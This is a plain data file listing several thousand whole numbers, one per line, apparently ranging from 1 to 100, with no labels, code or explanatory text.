58
41
68
59
69
28
44
68
84
1
26
34
26
80
59
37
6
34
65
96
17
32
7
79
56
18
31
10
11
71
56
15
76
49
96
16
95
67
15
37
35
3
78
33
3
71
3
23
53
4
42
73
11
46
24
35
88
7
29
70
82
16
15
26
74
8
55
93
59
70
62
14
17
10
99
77
86
68
29
15
99
53
43
53
78
42
31
78
64
89
52
70
2
67
8
74
57
2
70
3
9
65
78
51
2
90
75
28
50
74
71
63
30
72
18
96
88
75
88
21
94
87
34
65
8
41
2
6
32
3
66
93
92
43
63
40
80
31
82
17
81
27
15
28
68
40
12
8
65
65
89
59
72
30
39
84
5
29
47
60
21
49
95
41
65
20
71
36
38
27
66
50
1
47
82
20
14
97
67
90
55
27
17
70
29
19
60
75
83
21
53
61
16
54
15
7
13
6
75
24
80
84
67
90
14
72
77
4
80
78
76
66
60
54
35
19
100
50
21
48
85
98
17
53
98
68
89
60
69
18
66
69
11
74
27
77
40
89
42
57
75
38
57
80
73
11
77
94
85
15
8
53
88
71
32
23
5
22
94
89
26
77
19
98
3
83
23
3
4
81
91
3
31
85
31
31
7
81
9
15
94
66
46
86
96
60
31
51
29
91
65
20
29
2
51
68
83
79
10
10
23
70
52
69
79
79
79
59
5
28
82
40
82
66
73
32
30
85
89
19
54
56
98
23
43
52
100
57
77
80
23
1
21
72
89
58
94
66
83
13
89
59
25
77
24
36
41
43
90
53
39
39
8
59
77
69
55
23
71
36
73
64
28
44
32
53
59
68
84
58
74
50
85
94
79
40
71
58
8
74
26
62
64
45
48
2
75
97
53
88
40
3
92
19
70
19
16
40
46
82
6
4
68
77
33
79
85
57
8
1
44
2
63
28
76
60
96
71
95
47
6
35
1
84
45
37
68
35
92
51
7
6
59
50
9
64
41
98
58
65
64
71
91
42
97
67
13
57
53
44
14
13
74
62
9
68
59
15
43
71
85
95
78
68
71
53
28
66
22
14
77
20
80
1
54
30
57
47
69
41
6
34
88
47
100
98
90
70
94
77
19
42
8
69
73
27
24
9
42
75
79
89
56
51
90
23
84
100
6
17
85
89
56
18
12
82
79
17
18
33
87
6
8
14
72
85
91
31
98
39
20
61
74
91
28
78
68
76
84
68
50
44
13
51
92
44
96
34
53
45
22
91
46
73
3
100
53
1
58
97
58
15
38
15
23
57
37
42
65
59
35
70
80
21
73
1
98
77
62
5
35
96
23
88
62
85
61
19
86
73
84
16
72
48
37
73
41
25
57
89
17
32
76
76
4
78
36
16
80
51
88
79
55
8
13
72
57
67
98
6
24
7
78
33
32
79
48
47
49
50
22
90
63
18
2
33
24
85
100
100
21
57
65
20
15
75
32
77
75
67
86
64
25
68
83
60
23
9
79
66
65
72
43
84
100
3
73
55
34
5
29
13
37
15
40
67
30
4
75
66
10
81
75
72
84
90
20
15
56
8
74
77
21
44
48
25
24
18
4
60
14
39
36
82
64
45
86
65
46
64
74
87
36
92
68
98
62
48
98
6
31
22
72
18
36
33
37
82
65
91
91
54
44
38
87
81
61
90
8
11
14
77
83
68
43
9
80
23
11
77
77
35
58
81
14
65
75
2
30
82
85
80
66
50
97
90
34
80
85
63
22
12
29
11
68
88
28
53
100
88
47
47
41
1
80
58
22
58
74
6
77
52
44
23
100
86
84
81
85
48
77
94
69
27
30
68
80
93
92
88
24
8
78
16
98
41
39
42
36
71
77
35
89
95
56
8
37
51
65
55
20
19
13
1
14
74
94
8
17
21
82
62
39
48
41
60
77
75
38
15
79
84
13
8
76
12
1
33
46
96
68
27
29
29
44
33
54
18
62
72
27
54
68
68
7
6
38
1
100
95
37
23
42
12
41
49
1
94
98
67
26
36
75
3
61
25
64
63
43
12
91
86
89
27
94
2
29
43
80
67
75
35
47
53
26
5
66
15
14
77
29
99
18
15
91
83
89
26
74
84
61
34
40
74
94
25
49
58
95
34
97
25
33
74
12
50
64
35
57
43
53
46
26
22
22
81
85
51
38
68
6
28
58
16
92
90
48
20
8
57
64
64
54
56
16
34
87
55
96
67
21
79
22
24
33
44
96
1
48
42
30
62
69
59
96
8
90
36
90
99
30
68
46
48
49
68
98
44
28
96
6
98
100
31
52
12
58
92
40
61
90
12
46
22
62
10
68
59
87
6
58
48
61
25
100
36
79
21
14
39
46
40
67
89
57
25
59
87
1
66
18
96
36
33
84
92
83
23
78
11
16
32
47
81
24
66
16
70
61
65
26
60
76
71
1
4
90
40
81
16
91
17
92
59
30
39
83
54
29
5
56
58
56
95
87
78
27
54
89
56
50
9
72
27
49
10
63
37
12
71
92
39
6
19
16
79
66
33
35
35
97
94
80
27
88
77
49
63
58
55
6
64
75
12
77
39
86
62
57
92
45
72
60
95
69
74
10
20
77
28
61
71
40
72
69
11
18
98
35
43
52
2
11
24
83
48
100
66
46
23
84
96
90
43
100
91
2
6
18
25
94
62
19
31
55
10
50
93
31
35
9
2
17
34
80
48
30
24
56
94
85
32
96
21
50
93
24
44
15
82
52
88
88
23
24
92
7
98
7
67
8
47
82
38
70
99
74
4
60
92
37
91
8
17
56
44
54
29
12
59
64
3
70
12
34
97
53
15
74
73
46
3
42
54
12
60
47
64
14
53
22
19
91
92
55
52
72
42
43
49
71
26
99
70
66
50
41
26
75
24
73
91
21
84
22
97
61
32
59
6
45
56
89
55
91
51
3
59
83
97
95
10
23
68
93
17
63
32
23
97
5
94
94
63
88
57
100
61
22
51
97
50
40
94
24
52
35
81
85
59
78
78
63
59
26
53
14
67
62
22
94
19
33
36
51
87
100
83
11
16
79
54
67
37
9
56
82
68
94
82
32
14
100
57
65
81
22
41
5
75
3
57
80
18
61
61
6
54
27
58
96
62
62
1
21
56
57
44
29
84
37
23
64
1
1
10
23
48
30
46
89
74
90
32
52
1
52
82
30
54
49
28
52
97
35
66
92
44
38
58
24
56
3
5
40
76
53
66
11
29
44
12
35
73
32
95
86
100
46
1
98
76
81
63
40
39
29
53
85
52
71
68
100
16
91
31
57
29
43
5
89
91
87
42
37
30
13
85
84
93
90
35
68
76
28
78
97
1
33
91
49
68
97
61
65
95
80
27
89
66
75
24
35
66
47
97
32
79
79
14
16
94
94
86
65
13
59
16
12
69
81
25
71
65
16
49
93
71
95
62
10
58
71
58
31
82
48
29
76
37
40
81
66
97
96
49
17
30
98
80
72
38
83
80
33
19
87
50
87
99
18
25
26
49
50
37
39
70
62
34
18
33
20
76
56
37
43
88
45
2
62
79
95
23
64
46
73
56
14
79
1
10
69
85
80
62
96
38
34
83
43
15
98
33
48
75
1
20
92
88
18
83
43
38
55
88
87
55
40
67
100
2
21
84
28
26
52
27
75
19
41
2
30
63
8
92
92
17
18
95
26
77
78
22
93
91
95
89
71
11
88
4
98
93
78
41
15
92
99
95
23
1
58
19
40
56
66
14
29
28
98
11
86
67
64
17
36
88
34
73
40
78
28
6
1
97
10
96
64
73
67
12
40
75
50
37
64
39
50
84
30
39
27
50
30
19
6
86
9
94
80
59
27
25
28
82
49
9
93
87
60
51
72
4
91
14
7
92
73
30
13
69
4
20
83
71
73
33
73
10
22
35
55
75
72
82
67
92
82
65
97
52
30
9
37
15
53
20
10
78
91
37
68
30
67
76
99
19
100
90
86
48
10
34
66
96
74
21
10
39
26
14
14
23
90
32
69
78
19
57
89
23
53
26
49
31
56
66
19
45
9
74
58
56
5
8
98
13
27
42
57
39
29
56
14
99
94
82
76
80
58
56
94
97
51
52
28
61
6
73
98
38
63
51
60
25
84
45
26
16
57
83
35
98
86
17
53
64
23
7
23
84
64
65
52
13
64
48
37
22
42
60
71
95
59
77
64
32
55
33
33
22
90
63
63
63
94
12
86
53
91
45
64
89
52
99
8
76
19
87
50
95
27
11
51
17
98
24
65
94
14
21
99
70
67
45
50
96
61
38
36
3
19
6
11
82
3
34
17
94
28
61
86
74
39
9
99
57
46
64
68
98
59
27
69
16
8
64
99
20
72
35
17
50
11
100
51
17
77
9
81
68
16
83
14
61
77
11
91
42
81
81
38
68
90
34
59
98
86
78
46
93
93
51
34
70
26
73
2
21
18
41
98
5
57
63
86
48
61
61
70
45
92
66
23
11
36
39
89
32
10
74
12
27
54
25
9
61
55
67
6
44
20
49
52
98
8
61
69
68
35
22
1
40
46
48
4
30
66
41
4
64
14
16
72
49
9
3
99
44
86
48
53
10
23
34
54
55
84
49
6
99
54
48
42
45
38
64
43
51
21
3
54
97
53
98
92
28
16
52
97
83
64
52
80
14
94
97
11
48
86
43
22
38
10
68
15
78
68
81
69
13
38
53
73
38
75
41
96
74
50
55
72
76
9
45
42
13
62
81
93
68
87
12
73
100
46
15
87
93
32
31
24
42
43
7
49
93
81
85
38
60
67
36
3
74
43
7
88
2
5
94
21
38
36
76
4
97
89
91
73
25
62
79
75
61
12
85
71
34
48
54
84
62
33
3
29
18
18
57
40
57
75
21
63
91
84
77
46
67
13
71
37
96
14
31
82
97
41
41
29
89
60
50
44
66
72
28
20
37
90
88
29
7
73
81
41
52
90
27
90
19
36
17
48
15
73
79
71
26
44
72
45
69
69
39
7
54
8
8
38
79
19
95
37
5
66
9
41
53
95
68
62
31
36
93
36
20
51
9
18
19
14
21
72
56
51
31
92
92
19
67
82
62
86
15
96
76
68
68
33
12
82
76
44
97
63
4
60
80
89
20
12
51
53
49
13
5
61
77
15
9
48
25
66
27
75
47
74
39
2
33
5
47
40
6
48
9
19
28
18
13
89
29
32
83
84
52
92
85
58
14
55
81
61
19
22
72
100
45
95
77
35
16
60
61
70
11
55
55
9
25
46
9
81
78
20
68
44
38
84
59
47
36
55
89
39
45
89
63
77
53
76
74
49
57
82
65
75
56
38
8
5
41
13
94
64
40
22
49
43
34
26
70
96
56
21
41
48
95
94
57
20
1
48
2
5
62
18
76
98
45
65
47
54
19
26
10
58
28
12
47
88
13
32
4
13
42
11
39
10
18
79
5
87
79
90
27
74
86
17
70
83
55
34
88
23
49
7
64
68
90
54
43
97
9
72
2
34
49
39
7
49
81
99
80
88
22
58
57
33
30
36
48
39
66
46
60
81
86
77
42
25
14
2
36
18
74
77
49
30
45
50
78
9
7
16
96
45
49
37
29
12
44
81
21
93
32
50
32
54
53
22
16
52
55
24
22
66
32
54
6
14
62
96
79
73
42
60
31
25
71
43
79
91
33
20
55
19
87
16
3
58
9
42
60
44
81
24
20
73
81
48
11
1
94
84
22
11
60
98
49
67
59
76
44
73
53
64
95
48
10
10
3
81
22
7
73
92
86
90
53
57
69
81
24
42
8
12
78
44
84
84
2
19
34
50
69
34
14
21
23
48
80
97
94
47
28
23
69
29
34
17
57
76
56
96
82
68
58
60
77
77
91
40
19
10
62
25
6
87
52
88
38
11
97
84
57
59
20
98
61
82
47
84
42
76
89
84
75
66
25
63
97
36
19
85
40
86
89
77
68
12
28
56
28
23
99
33
27
39
93
92
80
10
34
36
79
84
58
63
27
10
82
92
23
42
98
97
44
15
16
58
92
39
81
83
46
86
99
65
68
12
39
43
39
14
16
8
91
67
43
46
60
32
79
89
95
36
89
8
52
39
20
79
72
9
81
35
50
51
33
62
6
53
51
65
21
76
94
54
52
55
68
34
66
92
58
20
49
11
53
85
60
97
8
81
31
94
48
8
27
29
32
21
80
90
38
74
92
4
50
41
4
23
82
81
34
62
42
99
73
82
86
91
47
65
36
42
54
44
22
83
34
79
35
35
61
80
65
29
18
88
82
51
25
81
95
73
11
99
29
77
54
54
90
26
62
23
38
89
77
21
60
57
80
67
39
21
65
61
56
49
75
29
18
47
24
46
79
85
29
25
9
100
77
33
51
20
26
4
90
50
45
42
28
9
78
79
83
25
33
12
40
43
82
10
55
68
7
38
46
29
79
61
72
7
28
73
34
25
80
79
39
32
20
66
35
60
69
33
82
8
62
84
56
42
42
93
51
35
50
31
71
74
50
21
15
83
64
35
87
50
91
29
37
86
60
93
57
82
21
60
40
25
93
64
51
50
3
26
83
4
76
63
49
22
72
89
48
9
70
77
53
36
52
65
80
70
49
56
93
40
12
19
16
29
98
79
1
70
18
90
58
2
58
17
44
16
52
58
29
26
31
76
99
11
12
1
5
60
66
24
11
59
83
20
22
21
28
21
80
13
83
29
34
64
49
74
58
2
43
78
98
63
21
10
36
56
66
94
65
37
71
85
3
29
26
4
34
24
5
52
68
68
66
70
4
78
17
95
96
84
87
21
75
79
92
27
87
85
9
15
86
83
87
66
48
58
3
82
3
39
76
73
92
2
9
14
44
92
74
34
52
83
11
88
87
42
7
33
82
74
60
94
29
10
77
69
84
33
84
98
94
62
24
49
93
22
80
2
80
87
69
95
23
88
79
57
27
37
17
65
88
29
78
63
52
71
9
76
50
91
23
5
45
83
87
11
28
67
1
39
19
26
11
85
95
65
16
73
22
38
64
92
90
18
92
75
61
42
28
9
73
38
25
51
11
92
3
56
87
81
89
13
21
19
76
80
18
54
8
3
8
72
60
43
14
87
36
96
58
97
62
26
69
75
80
65
92
18
74
3
24
79
66
57
62
54
17
94
20
37
20
62
18
7
4
80
11
83
80
55
65
8
99
77
67
46
38
18
66
86
32
46
23
43
54
53
70
48
3
71
64
69
69
24
85
9
86
84
18
81
62
71
36
93
73
100
78
8
80
22
26
68
61
84
66
48
94
2
66
63
60
65
18
99
59
10
58
36
52
97
86
19
71
93
3
85
81
32
98
24
21
29
64
12
15
98
64
40
52
79
72
59
21
28
92
85
53
64
52
62
12
33
65
13
45
2
37
88
52
13
85
20
40
14
30
100
28
62
62
71
16
11
75
53
62
88
79
71
31
99
85
32
51
3
96
32
18
80
24
84
10
66
23
68
86
32
26
50
70
66
90
13
5
63
77
62
25
79
21
3
37
98
76
52
37
73
37
31
58
15
14
37
21
22
32
82
60
21
14
84
96
41
96
11
1
34
89
50
71
8
1
35
68
6
41
4
99
88
33
34
81
35
57
98
81
4
100
50
52
71
87
17
60
11
36
59
27
13
39
28
1
30
88
28
65
74
68
34
21
63
7
60
19
70
7
80
16
82
61
28
4
53
9
28
1
12
62
38
28
93
86
23
100
50
89
47
53
39
99
28
16
6
90
17
68
43
96
38
42
61
71
73
47
37
33
85
38
75
91
58
9
41
11
95
84
69
61
75
88
10
56
18
86
10
44
79
53
33
53
29
39
77
6
46
65
73
25
53
26
56
21
27
22
71
98
34
83
41
91
7
86
22
26
50
50
25
4
58
90
17
28
92
26
65
71
82
90
91
16
48
89
37
94
34
1
35
65
47
78
9
8
87
5
47
64
46
65
3
5
16
65
2
61
49
100
36
23
39
44
22
64
42
29
84
45
49
37
19
35
8
98
37
84
17
41
1
74
98
97
85
53
83
3
41
68
11
37
74
95
16
22
39
99
61
92
32
95
82
44
31
16
33
25
90
100
19
85
72
89
28
69
76
77
24
47
9
32
89
31
50
6
63
4
31
32
62
42
78
55
61
82
88
99
88
26
74
83
35
12
92
13
95
40
66
2
65
55
35
98
86
86
47
48
88
7
66
70
39
30
70
80
48
1
33
10
83
59
10
83
27
14
48
44
8
12
2
49
59
75
10
37
71
38
9
51
19
28
92
40
63
58
52
85
66
60
3
95
46
81
47
14
15
30
94
50
79
7
7
2
93
40
74
20
58
14
61
31
95
8
4
31
10
79
33
2
61
73
50
22
64
51
35
37
89
38
8
56
14
75
87
28
50
35
20
77
63
2
27
52
9
86
72
92
41
63
89
92
87
64
21
53
77
67
78
48
49
94
82
16
10
46
21
10
53
23
23
78
53
58
81
23
77
11
29
22
68
36
16
28
11
14
89
39
52
73
41
67
21
29
65
71
56
77
27
53
67
64
91
99
48
33
38
80
97
13
49
96
24
65
26
31
42
61
45
76
47
62
77
34
26
29
70
70
84
24
6
44
69
82
73
2
46
93
15
58
40
53
88
54
4
1
5
98
90
14
99
60
76
82
69
18
83
21
8
20
15
67
41
69
37
77
71
96
68
92
97
68
41
89
3
21
36
33
6
66
96
71
78
21
89
16
8
73
29
18
43
4
4
52
53
43
92
14
69
66
27
44
67
71
77
15
52
84
74
48
4
18
54
29
58
32
37
18
67
69
84
6
74
50
29
69
68
62
58
8
65
18
3
64
57
62
42
79
62
47
99
45
100
20
90
89
3
21
72
53
55
54
37
81
10
61
38
27
26
61
47
41
29
85
16
53
19
68
100
18
38
61
92
12
89
1
76
53
15
19
20
48
69
46
60
67
94
56
47
30
76
81
53
8
4
3
35
93
8
37
83
57
74
75
85
63
41
10
8
37
96
66
91
24
7
43
18
28
27
25
60
60
55
18
42
40
44
49
96
14
61
39
96
78
14
37
8
82
83
13
29
73
80
93
38
95
21
78
75
16
9
14
18
83
99
82
88
26
40
76
67
52
87
57
40
28
39
53
87
90
70
17
79
77
39
88
96
50
43
68
47
48
7
85
73
4
81
48
43
37
53
15
27
69
9
82
72
53
82
98
61
32
94
37
3
25
39
49
31
40
86
39
98
10
8
12
54
87
47
59
96
48
94
19
75
77
58
50
89
52
98
74
66
31
39
97
82
77
81
89
66
16
93
59
69
48
68
38
21
75
62
39
82
72
93
13
65
93
18
30
45
7
94
67
34
92
10
92
73
36
83
9
25
62
16
74
10
95
76
62
81
23
33
86
14
70
3
83
62
97
31
95
10
44
47
58
15
25
17
8
30
25
12
58
30
7
70
80
56
98
23
20
2
55
21
93
84
60
20
8
22
30
11
41
43
55
6
2
50
64
1
69
10
65
2
39
40
65
12
88
31
87
39
97
71
5
62
100
65
57
87
15
77
56
3
70
71
48
6
76
76
50
23
69
44
67
67
55
31
92
76
5
13
39
61
86
74
31
59
100
73
39
96
13
80
92
79
74
10
29
57
97
17
69
28
85
78
6
35
4
9
92
94
45
49
60
70
19
2
27
76
66
57
89
80
8
95
65
76
6
62
9
14
10
86
52
44
76
79
79
74
44
23
20
82
69
96
5
72
64
3
98
61
60
98
69
5
14
21
75
1
62
44
37
23
45
26
48
71
84
96
23
13
22
39
51
71
57
63
61
97
84
85
90
29
82
42
9
81
76
57
96
28
17
34
87
33
87
54
5
15
40
18
87
89
51
15
55
33
32
34
80
65
63
77
62
61
39
62
26
22
66
93
58
85
97
31
83
64
83
94
84
79
47
2
35
15
78
16
59
90
13
44
8
7
10
60
43
17
6
35
58
21
88
100
15
23
25
36
41
38
95
92
2
67
31
21
98
38
48
35
38
37
89
42
26
100
55
13
21
25
84
62
21
79
64
80
58
90
57
81
75
42
16
90
11
83
75
81
39
1
51
17
72
88
34
32
42
51
12
95
58
91
52
89
37
21
94
15
43
46
39
47
7
95
12
50
84
64
51
43
75
77
17
79
7
52
72
41
46
20
90
24
38
95
98
49
5
78
86
85
11
45
85
35
73
66
73
44
13
86
71
11
86
46
98
34
30
36
62
84
8
54
60
19
7
6
42
88
79
20
84
97
52
7
71
54
15
8
42
23
54
50
25
59
12
1
86
75
60
31
38
58
75
53
94
1
84
15
19
75
95
8
4
71
22
1
36
40
77
74
96
1
47
48
43
50
84
54
47
63
47
60
75
70
6
33
20
30
91
46
96
14
39
56
10
77
50
69
18
64
60
21
59
43
43
55
92
56
3
54
15
11
21
50
10
44
13
47
24
98
66
57
25
54
9
35
1
31
24
43
62
46
14
66
45
38
57
90
88
93
84
22
21
20
43
44
44
45
16
20
67
69
81
32
28
60
34
49
90
43
94
75
31
15
16
40
70
54
94
21
44
73
2
73
4
35
11
16
38
99
17
94
12
1
73
72
69
75
82
46
32
17
44
81
4
66
48
89
56
56
58
56
25
68
69
41
94
90
17
17
40
46
37
33
59
10
47
72
100
37
39
3
40
70
32
14
41
46
1
11
65
6
10
80
24
8
40
89
82
91
43
55
46
87
12
73
25
30
87
15
21
74
29
39
26
50
24
90
60
44
47
58
100
63
41
4
48
58
26
53
73
76
95
20
19
60
13
50
34
99
92
1
62
21
97
3
52
73
76
31
2
31
5
47
33
54
91
52
73
22
44
50
33
53
20
18
65
94
98
29
71
71
74
9
10
59
77
13
35
6
64
17
30
55
72
31
47
47
89
63
55
57
61
61
21
6
80
88
38
60
75
79
21
50
70
2
69
44
97
95
16
32
85
87
82
48
15
96
6
53
88
38
7
82
76
12
29
30
17
86
57
3
81
97
78
7
3
60
56
30
14
15
75
12
22
27
6
66
39
75
58
39
45
46
5
15
35
35
73
28
34
41
26
31
78
12
76
30
32
97
91
18
91
4
20
35
50
57
60
89
61
21
50
60
2
28
100
45
24
25
100
54
26
16
1
97
49
17
1
36
98
95
37
89
18
47
3
93
92
81
100
73
32
71
49
47
53
32
52
72
6
3
5
63
86
91
87
8
22
77
35
16
59
98
66
50
12
53
36
75
20
11
50
75
98
99
5
46
34
62
27
75
100
42
15
50
50
22
40
90
35
16
54
45
9
67
26
63
34
64
95
82
93
81
54
77
34
21
96
65
1
96
49
40
23
73
16
63
63
29
44
81
65
7
15
22
93
73
99
9
25
52
18
29
13
91
73
44
28
84
63
79
72
1
60
81
27
64
13
26
33
4
29
75
65
72
4
76
64
5
60
23
32
34
3
13
30
77
7
28
97
61
96
65
54
12
82
98
69
79
89
57
11
32
24
29
76
40
36
96
68
8
87
68
93
31
84
66
5
58
65
77
30
30
56
8
61
47
90
54
11
67
68
55
87
71
44
12
10
16
15
71
67
100
33
18
37
6
63
28
38
52
39
76
86
100
80
72
82
19
45
22
46
5
76
88
77
93
59
12
77
2
10
36
28
74
41
35
78
85
94
99
12
76
13
61
21
70
99
30
87
17
66
12
34
58
7
16
37
26
87
72
69
89
46
27
98
80
94
59
47
91
88
57
43
43
72
63
42
10
67
14
12
90
33
71
76
98
15
71
40
8
81
73
12
49
26
34
85
40
74
81
31
89
24
92
35
79
45
55
4
20
63
38
72
10
2
99
4
57
88
27
39
34
99
73
1
30
83
82
99
97
75
67
56
64
3
20
34
63
20
61
4
86
16
33
66
4
92
22
22
28
80
16
67
57
85
98
72
19
6
1
75
11
94
26
56
25
42
63
14
97
60
6
55
94
10
45
10
73
54
87
76
9
7
16
46
83
78
96
98
80
87
45
51
45
65
1
64
21
23
1
67
85
93
35
41
13
60
76
49
10
16
8
1
88
35
63
64
4
96
69
5
55
94
91
97
71
33
39
3
20
35
91
97
10
15
78
77
19
63
4
20
60
49
86
65
66
6
73
30
14
17
70
39
89
33
88
19
16
89
48
31
68
61
81
16
72
52
10
79
20
98
56
15
53
22
79
27
66
8
56
96
61
30
82
55
88
3
25
56
73
15
91
76
20
64
94
76
19
81
31
78
7
98
16
53
41
80
3
98
12
15
17
30
40
84
93
1
37
3
44
50
2
94
56
66
11
46
98
20
74
9
33
60
40
2
61
16
4
84
34
34
56
70
26
56
67
54
8
21
62
63
83
36
71
60
99
25
59
13
27
27
37
27
55
36
19
77
32
77
45
1
98
41
49
2
54
54
20
74
12
3
95
3
43
75
23
27
5
21
38
65
57
55
92
98
28
91
93
77
58
92
79
84
92
74
22
10
51
15
73
10
15
79
57
44
12
16
54
47
84
24
34
74
29
3
76
84
5
3
18
91
49
38
70
63
89
59
77
55
48
96
37
9
78
29
50
77
77
98
20
64
74
63
36
9
3
39
44
94
79
57
24
22
20
12
82
95
68
67
35
67
84
59
87
12
92
88
43
89
57
2
88
76
46
35
98
60
38
69
10
68
62
59
34
14
6
59
16
89
12
26
31
8
47
18
70
53
66
40
87
39
9
87
90
24
58
29
45
58
9
71
19
27
73
11
66
42
53
62
80
60
59
29
15
2
49
62
38
73
56
51
38
1
34
17
72
90
55
25
33
99
40
73
64
12
12
21
78
20
83
12
97
86
69
89
50
17
44
12
60
69
45
5
69
14
48
84
2
79
60
97
19
65
41
81
23
100
41
32
95
26
70
74
85
28
38
45
80
73
1
37
84
10
35
92
96
74
74
53
47
75
3
63
6
70
3
65
45
60
58
61
81
63
17
96
6
54
40
24
82
10
100
87
3
45
56
19
94
44
19
36
70
40
44
60
6
65
66
55
38
96
84
32
38
99
76
25
1
16
13
1
39
19
48
35
14
84
88
66
52
92
5
69
22
47
85
78
14
37
28
57
68
63
80
47
79
44
91
89
29
11
29
69
91
98
56
38
29
77
88
94
91
56
50
93
13
26
89
71
90
89
43
93
29
7
42
96
6
86
85
45
55
3
2
39
46
82
93
5
99
78
35
99
28
87
72
92
62
12
69
80
18
93
93
90
79
74
68
41
44
30
59
3
85
16
69
69
39
21
60
81
91
3
88
15
68
30
49
85
70
67
16
14
19
4
32
52
33
30
9
17
53
52
63
35
74
78
50
72
38
66
42
12
84
76
54
48
91
56
37
36
95
19
77
70
74
77
44
11
26
52
77
91
83
95
96
33
66
59
79
29
97
85
18
89
20
44
25
53
74
23
6
14
54
89
90
67
26
52
54
91
58
100
42
73
18
99
100
71
74
13
3
64
4
19
99
22
95
37
96
91
88
84
79
45
52
50
99
86
15
19
78
69
93
44
58
94
97
91
83
91
25
52
19
35
56
49
10
74
25
17
84
75
26
59
14
80
89
90
13
27
97
31
81
67
30
31
57
55
38
21
19
95
4
84
56
75
47
51
28
29
18
60
90
93
56
76
35
62
28
62
1
59
30
21
24
57
94
32
28
90
18
23
74
17
26
41
74
66
74
4
86
74
1
51
85
2
40
83
4
86
68
61
87
64
98
63
14
73
63
54
100
54
48
86
24
82
14
13
61
9
100
40
23
41
24
73
11
80
38
30
8
42
27
71
22
67
49
26
60
82
74
8
41
41
72
76
69
94
18
23
67
24
30
45
94
5
95
71
93
93
68
40
42
44
71
43
76
4
52
94
77
72
61
53
3
53
34
78
59
94
80
25
18
93
37
9
40
46
80
80
91
75
56
33
89
15
14
91
47
26
68
90
45
67
22
44
31
4
18
26
58
41
48
47
80
24
19
56
24
3
49
32
9
51
85
34
64
49
31
82
20
42
64
53
48
87
88
88
90
28
29
66
11
37
35
46
38
55
14
70
25
67
41
54
32
41
95
78
84
65
58
22
47
81
72
7
92
68
89
17
11
76
85
3
86
40
51
60
10
27
82
64
76
50
28
48
60
38
33
29
39
39
69
100
53
76
20
81
30
67
21
73
58
48
51
7
57
81
88
35
21
89
17
84
49
71
5
52
44
70
22
7
14
74
60
2
44
86
66
1
30
4
62
58
79
25
81
82
41
83
57
45
78
74
99
14
92
42
20
73
92
83
3
65
86
51
81
25
66
4
77
6
49
30
59
3
93
70
74
74
46
26
68
100
50
22
5
93
76
38
43
60
15
16
81
44
79
37
84
16
57
97
2
52
41
46
35
94
28
84
85
8
41
23
1
43
89
11
23
66
31
40
100
33
35
45
71
16
60
100
91
98
4
59
30
23
14
13
74
35
21
86
78
3
48
72
27
50
10
53
83
57
52
17
97
72
87
98
30
66
28
90
74
13
12
34
30
43
6
20
36
91
59
65
19
31
34
5
45
63
44
18
2
75
26
27
72
63
23
31
61
41
96
90
91
61
25
1
68
98
34
87
57
88
72
87
33
46
7
76
86
65
69
49
83
85
65
40
78
81
50
66
51
48
32
6
39
92
49
4
85
52
52
46
71
78
6
84
91
2
91
94
55
55
35
50
22
63
91
84
16
19
45
54
47
7
60
40
23
32
26
100
63
19
18
20
55
51
16
42
52
2
75
18
64
90
42
98
17
15
92
13
82
48
54
97
39
90
36
22
22
94
22
41
47
99
15
20
25
65
98
76
13
82
67
83
61
72
58
80
33
76
89
53
58
23
3
71
14
39
91
70
73
30
31
97
82
69
50
9
55
79
53
93
15
5
89
43
48
12
55
64
47
83
2
20
61
95
48
9
49
65
2
51
1
93
57
88
96
74
99
71
80
99
9
49
66
28
61
54
18
65
73
58
8
42
81
82
53
38
37
77
40
40
65
12
18
24
65
59
16
46
2
79
81
76
45
53
17
89
21
65
34
23
79
57
88
100
4
97
70
10
91
78
66
82
68
37
88
26
52
15
80
89
88
36
18
89
63
87
1
2
23
72
9
95
84
71
28
18
40
80
17
91
33
40
76
66
35
2
36
28
40
85
30
61
78
84
83
50
35
67
28
97
60
69
36
82
97
25
91
52
52
93
39
67
57
60
19
76
86
55
16
24
100
52
89
72
68
55
12
72
88
70
90
14
69
78
38
18
99
43
93
99
15
4
34
95
50
18
76
12
21
99
62
63
5
49
75
53
1
89
4
43
52
65
60
13
11
55
81
77
85
44
49
79
57
84
55
73
29
53
80
66
88
11
48
15
59
87
98
5
50
70
91
100
76
75
49
53
68
98
31
70
38
66
63
56
81
54
96
18
77
45
81
76
58
46
3
10
96
33
50
19
86
65
37
45
81
35
12
26
82
12
78
69
4
90
17
4
19
78
40
37
42
10
38
3
55
1
69
32
37
11
83
82
89
32
70
12
6
26
87
81
100
51
28
79
55
32
90
61
45
74
27
73
2
9
89
55
54
72
88
67
66
23
77
59
8
51
84
3
93
36
78
5
14
52
90
43
55
9
57
53
59
36
4
44
100
31
47
14
22
31
18
31
15
93
95
12
38
60
68
2
76
12
31
5
63
100
51
87
14
2
100
20
91
16
84
94
99
77
99
56
98
57
57
15
56
25
49
98
17
13
58
36
65
64
96
67
71
13
5
31
74
37
56
34
34
29
74
5
14
56
66
48
75
80
29
5
64
56
66
34
83
69
59
95
55
100
13
35
61
27
34
88
23
14
18
55
30
47
87
76
95
68
68
32
48
44
18
21
61
67
4
33
95
13
18
24
30
87
36
43
55
83
82
58
12
44
75
84
60
28
16
64
31
28
32
90
2
14
61
38
80
17
32
50
67
32
86
19
68
54
74
70
9
13
11
73
12
95
8
73
39
100
92
60
59
96
67
84
51
4
9
61
85
44
86
5
53
48
55
66
49
13
21
61
40
84
15
75
11
57
79
32
96
82
21
6
32
67
46
32
69
34
55
70
73
80
40
6
85
38
79
72
15
22
10
11
6
64
38
44
52
70
89
10
96
92
88
64
26
43
17
46
96
92
98
40
40
17
1
11
15
2
91
41
19
53
50
76
62
1
17
60
92
50
68
52
68
53
63
31
69
70
65
12
36
44
8
96
5
43
69
3
70
12
61
43
21
49
94
36
48
89
3
32
52
7
8
97
63
9
82
18
53
19
41
30
91
40
17
27
59
13
15
31
97
39
93
47
86
55
81
99
19
53
38
85
36
55
4
48
50
96
32
20
66
47
96
4
82
5
49
49
7
75
79
82
79
92
28
53
81
48
21
79
98
68
62
18
26
21
54
19
23
94
68
8
53
36
82
55
97
11
72
21
54
48
5
45
89
82
48
47
86
39
93
32
87
47
82
87
61
54
68
98
78
39
35
79
25
6
58
47
24
70
94
59
56
68
98
6
1
54
16
41
58
26
22
76
47
76
65
35
22
13
29
40
66
10
37
91
91
39
76
47
60
10
65
100
70
16
60
23
15
66
10
100
22
51
47
42
2
96
3
57
51
32
5
22
6
79
28
31
80
79
73
96
85
58
31
23
10
91
4
45
35
97
63
89
5
59
1
73
45
86
38
93
66
94
4
5
57
98
79
61
18
37
5
68
20
55
92
86
26
45
76
61
35
57
66
84
89
27
46
9
88
1
64
63
49
95
36
17
98
54
64
60
86
37
55
2
66
6
80
6
